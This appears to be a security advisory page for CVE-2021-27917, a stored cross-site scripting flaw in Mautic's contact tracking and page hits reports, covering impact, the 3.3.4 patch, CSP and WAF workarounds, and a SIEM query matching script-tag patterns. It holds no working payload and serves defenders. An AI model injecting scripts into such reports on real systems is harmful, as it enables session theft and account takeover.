CVE-2021-27917
📋 TL;DR
This stored cross-site scripting (XSS) vulnerability in Mautic allows attackers to inject malicious scripts into contact tracking and page hits reports. When users view these reports, the scripts execute in their browsers, potentially stealing session cookies or performing actions as the user. This affects all Mautic instances running vulnerable versions.
💻 Affected Systems
- Mautic
📦 What is this software?
Mautic by Acquia
Mautic by Acquia
Mautic by Acquia
Mautic by Acquia
Mautic by Acquia
Mautic by Acquia
Mautic by Acquia
Mautic by Acquia
⚠️ Risk & Real-World Impact
Worst Case
Attackers could steal administrator session cookies, gain full administrative access to the Mautic instance, and potentially pivot to other systems or steal sensitive customer data from the marketing automation platform.
Likely Case
Attackers inject malicious JavaScript that steals user session cookies when administrators or users view affected reports, leading to account compromise and unauthorized access to the Mautic dashboard.
If Mitigated
With proper input validation and output encoding, malicious scripts are neutralized before execution, preventing any successful exploitation.
🎯 Exploit Status
The advisory includes technical details about the vulnerability. Stored XSS vulnerabilities are commonly weaponized due to their persistence and impact.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 3.3.4
Vendor Advisory: https://github.com/mautic/mautic/security/advisories/GHSA-xpc5-rr39-v8v2
Restart Required: No
Instructions:
1. Backup your Mautic instance and database. 2. Update to Mautic version 3.3.4 or later. 3. Clear application caches. 4. Verify the update was successful by checking the version.
🔧 Temporary Workarounds
Disable contact tracking and page hits reports
allTemporarily disable the vulnerable reporting features until patching is possible.
Implement Content Security Policy (CSP)
allAdd a strict CSP header to prevent execution of injected scripts.
Add 'Content-Security-Policy: default-src 'self'; script-src 'self'' to web server configuration
🧯 If You Can't Patch
- Restrict access to Mautic admin interface to trusted IP addresses only
- Implement web application firewall (WAF) rules to block XSS payloads
🔍 How to Verify
Check if Vulnerable:
Check your Mautic version. If it's below 3.3.4, you are vulnerable.Check Version:
Check the Mautic admin dashboard or run: php bin/console mautic:versionVerify Fix Applied:
After updating, verify the version is 3.3.4 or higher and test that contact tracking reports properly sanitize input.📡 Detection & Monitoring
Log Indicators:
- Unusual JavaScript payloads in contact tracking data
- Multiple failed login attempts from new locations after viewing reports
Network Indicators:
- Outbound connections to suspicious domains from Mautic server after report views
SIEM Query:
source="mautic_logs" AND (message="*<script>*" OR message="*javascript:*")